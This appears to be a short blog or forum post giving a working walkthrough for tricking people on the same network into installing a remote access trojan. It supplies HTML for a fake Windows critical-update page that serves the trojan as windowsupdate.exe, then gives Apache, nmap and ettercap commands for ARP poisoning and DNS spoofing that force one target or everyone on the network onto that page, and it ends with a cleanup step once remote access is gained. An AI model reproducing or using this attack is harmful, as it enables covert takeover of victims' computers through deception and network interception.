This is how to get someone to download your rat if you're on the same network

This isn't supposed to be some amazing tutorial. I just want to have this so I don't have to keep answering he same damn question over and over again..

Start by downloading backtrack 5 and burning the iso.


Boot into backtrack and open the file browser, and browse to /var/www/. There will be file called index.html.
Open it with kate (or some other text editor) delete the code that is in there and copy in the following code.

<p align="center" class="style2">Critical Vulnerability in Windows XP, Vista, Windows 2000 detected. Download and installation of upgrade required. </p>
<p align="center">
<input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); return false;">
<p align="center" class="style2"></p>
<form id="form1" name="form1" method="post" action="/upgrade.exe">
<label for="D"></label>
<p align="left" class="style4">&nbsp;</p>

Now copy your rat into the same directory and name it windowsupdate.exe

Start apache

/etc/init.d/apache2 start

open firefox and navigate to Your fake update page should show up.

Now set up the dns_spoofing configuraton

echo "* A" >> /usr/share/ettercap/etter.dns

Replace with your own ip (ifconfig)

Use nmap to find your target ip

nmap -sP your_subnet/24

Now arp-poison with ettercap using the dns_spoof plugin.

ettercap -T -i wlan0 -M arp:remote / / -P dns_spoof

replace with your target's ip.
replace with your gateway ip.
replace wlan0 with your interface.

If you want to target everyone on the network you can use the following command.

ettercap -T -i wlan0 -M arp:remote / // -P dns_spoof

Now every time they try to navigate to a web page, they will be redirected to your update page.
Some people will be suspicious but after 5 min of not being able to browse, anyone will give in.

Once you get remote access stop ettercap right away and run the following command in the target computer's cmd.

ipconfig /flushdns

This will let them browse again.

Post a Comment